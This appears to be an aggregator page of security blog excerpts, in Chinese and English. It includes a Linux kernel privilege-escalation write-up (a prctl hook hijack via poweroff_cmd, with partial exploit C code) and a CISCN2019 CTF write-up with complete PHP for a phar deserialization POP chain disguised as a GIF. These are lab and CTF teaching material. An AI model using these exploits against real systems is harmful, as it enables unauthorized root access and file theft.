Aggregator

linux 内核提权总结(demo+exp分析) -- 任意读写(二)

povcfe
5 years 11 months ago
发表于看雪论坛 hijack_prctl篇 prctl函数: 用户态函数,可用于定制进程参数,非常适合和内核进行交互 用户态执行prctl函数后触发prctl系统调用 内核接收参数后执行security_task_prctl security_task_prctl执行hook.task_prctl poweroff_work_func函数: 内核函数,执行 run_cmd(poweroff_cmd),即root权限执行poweroff_cmd 攻击流程: 劫持hook.task_prctl为目标函数地址(poweroff_work_func) 修改poweroff_cmd为目标指令 用户执行prctl函数,触发 一. 利用步骤 1. 定位内核加载基地址(开启kaslr) 同hijack_vdso,泄漏vdso地址,因为内核kaslr开启后,只有较高字节的地址发生偏移,且vdso与基地址相距较近,所以可以使用vdso定位内核加载地址 2. 定位hook.prctl,poweroff_cmd地址 gdb调试内核并在security_task_prctl函数处下断点,用户态程序执行prctl函数,进入security_task_prctl函数,单步执行汇编指令,通过内存查看hook.task_prctl 地址 gdb 执行 p poweroff_cmd,获得poweroff_cmd真实地址 获得hook.prctl,poweroff_cmd与内核基地址固定偏移 3. 修改poweroff_cmd 为任意指令 4. 用户态执行prctl函数,触发 二. 驱动代码(见cred篇) 三. exp #define _GNU_SOURCE #include <stdio.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <stdlib.h> #include <sys/ioctl.h> #include <sys/auxv.h> #include <sys/prctl.h> #define CHANGE_POINT 0x100000 #define RW_READ 0x100001 #define RW_WRITE 0x100002 #define SET_MEM 0X100003 size_t poweroff_cmd = 0; size_t prctl_hook = 0; size_t poweroff_work_func = 0; size_t vmlinux_base = 0; struct vunl { char *point; size_t size; } VUNL; void leak_data(int fd, char *buf) { char *res = NULL; VUNL.

实战笔记之X厂滑动验证码漏洞挖掘

冷渗透
5 years 11 months ago
在传统安全界,验证码是很少有白帽子会去关注的一个点,但作为任何一个平台,特别是电商平台,由于黑产作恶手法日益猖獗,业务安全带来的损失,很可能会超过一个OWASP top 漏洞带来的危害。

实战笔记之X厂滑动验证码漏洞挖掘

冷渗透
5 years 11 months ago
在传统安全界,验证码是很少有白帽子会去关注的一个点,但作为任何一个平台,特别是电商平台,由于黑产作恶手法日益猖獗,业务安全带来的损失,很可能会超过一个OWASP top 漏洞带来的危害。

实战笔记之X厂滑动验证码漏洞挖掘

冷渗透
5 years 11 months ago
在传统安全界,验证码是很少有白帽子会去关注的一个点,但作为任何一个平台,特别是电商平台,由于黑产作恶手法日益猖獗,业务安全带来的损失,很可能会超过一个OWASP top 漏洞带来的危害。

CISCN2019 Dropbox Writeup

Driver Tom's Blog
5 years 11 months ago
0x00关于本文 感谢@glzjn大佬提供的buuoj复现环境! 0x01漏洞突破口 LFI  在注册登陆简单测试之后可以轻易地发现download.php的LFI漏洞

 后退两个目录即可获取源码(怎么知道是后退两个目录?多试试就知道了),我们发现download.php有这一行
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) { 看来很不幸,没法直接读flag
但是好在这个漏洞可以把题目中的所有源码都下载下来,方便我们审计
0x01 反序列化漏洞发现 看到download.php代码中存在这一行 include "class.php"; 一般来说像CTF题目这种超级超级小规模的项目是不会需要真正用到OOP来开发的,除非....想要用到相关的漏洞,比如反序列化 哪里有反序列化点呢?就藏在文件操作中。(相关阅读利用 phar 拓展 php 反序列化漏洞攻击面) 在download.php中存在如下代码(事实证明download.php并不能正常利用,在之后我会讲) $file = new File(); ... $filename = (string) $_POST['filename']; ... $file->open($filename) 跟到File类里面的open函数中,这个$filename被直接带入 file_exists($filename) 这样大黑客们就可以利用phar://伪协议用反序列化搞事情,好了我们开始审计代码!
0x02 POP Chain构造 我们现在需要构造POP Chain来RCE或者文件读取,要审计反序列化,我们第一步是需要找到起点,那就是__destruct或__wakeup函数,不过这道题目里面没有__wakeup函数,只有两个__destruct函数。 首先看到FileList类的__destruct     public function __destruct() {         $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';         $table .= '<thead><tr>';         foreach ($this->funcs as $func) {             $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';         }         $table .= '<th scope="col" class="text-center">Opt</th>';         $table .= '</thead><tbody>';         foreach ($this->results as $filename => $result) {             $table .= '<tr>';             foreach ($result as $func => $value) {                 $table .= '<td class="text-center">' . htmlentities($value) . '</td>';             }             $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">娑撳��娴�</a> / <a href="#" class="delete">閸掔娀娅�</a></td>';             $table .= '</tr>';         }         echo $table;     } } 好像啥都没有的样子。。。 那再看User类的     public function __destruct() {         $this->db->close();     } 这个$this->db我们是可以操纵的,那我们首先尝试找到一个close函数来继续这个链条 而File类里面恰巧有一个close函数,但是代码只有一句。 return file_get_contents($this->filename); 能读取是能读取,但是我又不能输出,这怎么可以呢? 这里$this->db->close()除了可以调用close函数之外,还可以在别的类不存在close的时候调用__call函数。 果不其然,在FileList类找到了     public function __call($func, $args) {         array_push($this->funcs, $func);         foreach ($this->files as $file) {             $this->results[$file->name()][$func] = $file->$func();         }     } 其中$func是"close",这个函数首先把"close"塞到了$this->funcs的尾部,接着遍历$files做了些蜜汁操作 $this->results[$file->name()][$func] = $file->$func(); 看了下大概是给File类量身定做的,只有File类才同时有name和close,而这里我们要是操纵$file的确能把内容塞到$this->results数组里面。 可是写进去了怎么读出来呢,那就要看到FileList类的__destruct函数了,仔细看下这个函数发现真的能把结果输出出来,那这样我们就形成了一条从User类到FileList类,再到File类的POP Chain。 0x03 EXP构造 (filename为什么是/flag.txt?我也想知道。这部分我是在网上看到别人的EXP这么写的 <?php class File {     public $filename;     function __construct()     {         $this->filename="/flag.txt";
    } } class FileList  {     private $files;     function __construct()     {         $this->files=[new File()];     } }
class User {     public $db;     function __construct()     {         $this->db=new FileList();     } } $o = new User(); $filename = 'avatar.phar.gif'; file_exists($filename) ? unlink($filename) : null; $phar=new Phar($filename); $phar->startBuffering(); $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); $phar->setMetadata($o); $phar->addFromString("foo.txt","bar"); $phar->stopBuffering(); ?> 0x04 最后利用 本来以为直接download.php里面直接用phar就可以的,没想到这个文件始终读不出来
接着才发现了我刚刚忽略的一行 ini_set("open_basedir", getcwd() . ":/etc:/tmp"); 原来他这里搞了个open_basedir害得我读不出来,但是问题不大,因为delete.php也操作文件,甚至不需要换参数。 url一换,结果就出来了
DriverTom

Attacking the Organism: Retail

F5 Labs
5 years 11 months ago
Online retail apps are a perfect storm of interconnecting infrastructure and insertion points. F5 Labs' Preston Hogue writes for SecurityWeek, discussing the wide range of risks that can threaten your apps, and how the need to understand the entire organism is critical.

2020 Cybersecurity Trends and Resolutions

F5 Labs
5 years 11 months ago
Knowing the trends in cyber security is key to protecting yourself. F5 Labs' Raymond Pompon writes for Teiss, discussing the three trends that will drive challenges and opportunities in 2020.

黑产研究之秒拨IP

冷渗透
5 years 11 months ago
黑产研究—“秒拨IP挖掘机”制作,故事背景 黑产的本质是利益,因利益而存......

Managed ad